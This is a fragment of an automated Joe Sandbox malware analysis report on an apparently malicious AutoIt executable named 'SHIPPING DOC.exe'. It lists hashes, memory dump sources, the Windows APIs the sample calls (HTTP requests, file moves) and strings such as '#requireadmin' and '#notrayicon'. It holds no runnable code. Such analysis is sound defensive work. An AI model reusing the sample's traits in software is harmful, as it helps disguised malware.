                                                                                                                      • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                      • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                      • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                      • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memmove$_memcmp
                                                                                                                      • String ID: '$\$h
                                                                                                                      • API String ID: 2205784470-1303700344
                                                                                                                      • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                      • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                                      • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                      • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                      • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                      • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                      • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                      • __swprintf.LIBCMT ref: 0045EC33
                                                                                                                      • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                      Strings
                                                                                                                      • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                                      • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                      • API String ID: 2441338619-1568723262
                                                                                                                      • Opcode ID: 88db3983bd4ed7f03cb514a0c18a36c5a2e0261ee80d3730b42f63d3e5698cbf
                                                                                                                      • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                      • Opcode Fuzzy Hash: 88db3983bd4ed7f03cb514a0c18a36c5a2e0261ee80d3730b42f63d3e5698cbf
                                                                                                                      • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                      APIs
                                                                                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                      • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                      • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                      • String ID: @COM_EVENTOBJ
                                                                                                                      • API String ID: 327565842-2228938565
                                                                                                                      • Opcode ID: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
                                                                                                                      • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                      • Opcode Fuzzy Hash: c53429027a938d0cb53d738561a5b537c268b9dae225d633b1d56c3c7d20582e
                                                                                                                      • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                      APIs
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                                      • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                                        • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                                        • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                      • String ID: H
                                                                                                                      • API String ID: 3613100350-2852464175
                                                                                                                      • Opcode ID: 6f8afcb4607c5af54da810b5d10f04910e32cf7df3ff1b1a5cf283966db8269a
                                                                                                                      • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                      • Opcode Fuzzy Hash: 6f8afcb4607c5af54da810b5d10f04910e32cf7df3ff1b1a5cf283966db8269a
                                                                                                                      • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                      APIs
                                                                                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                      • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                      • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                                      • String ID: close all
                                                                                                                      • API String ID: 4174999648-3243417748
                                                                                                                      • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                                                                      • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                                      • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                                                                                      • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                                      APIs
                                                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1291720006-3916222277
                                                                                                                      • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                      • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                                                      • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                                                      • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                                                      APIs
                                                                                                                      • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                                                      • IsMenu.USER32(?), ref: 0045FC5F
                                                                                                                      • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                      • String ID: 0$2
                                                                                                                      • API String ID: 93392585-3793063076
                                                                                                                      • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                      • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                      • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                      • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                      APIs
                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                      • String ID: crts
                                                                                                                      • API String ID: 586820018-3724388283
                                                                                                                      • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                      • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                      • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                      • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\SHIPPING DOC.exe,0040F545,C:\Users\user\Desktop\SHIPPING DOC.exe,004A90E8,C:\Users\user\Desktop\SHIPPING DOC.exe,?,0040F545), ref: 0041013C
                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                      • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                      • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                      • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                      • String ID: \*.*
                                                                                                                      • API String ID: 2326526234-1173974218
                                                                                                                      • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                      • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                      • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                      • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                      • _wcslen.LIBCMT ref: 004335F2
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                      • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                      • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                        • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                      • String ID: \
                                                                                                                      • API String ID: 321622961-2967466578
                                                                                                                      • Opcode ID: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                                      • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                      • Opcode Fuzzy Hash: c150a4e9996d72ab87fed94048e5703dbc8ac01b5d1c28e2aacddbc68f85fc9a
                                                                                                                      • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                      • Opcode ID: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                                                                      • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                      • Opcode Fuzzy Hash: 7c13aa0513e4bb2138c96398a5a2566d58b08304d963883aeef11e8644bf4991
                                                                                                                      • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                      • __lock.LIBCMT ref: 00417981
                                                                                                                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                      • __lock.LIBCMT ref: 004179A2
                                                                                                                      • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                      • String ID: KERNEL32.DLL$pI
                                                                                                                      • API String ID: 637971194-197072765
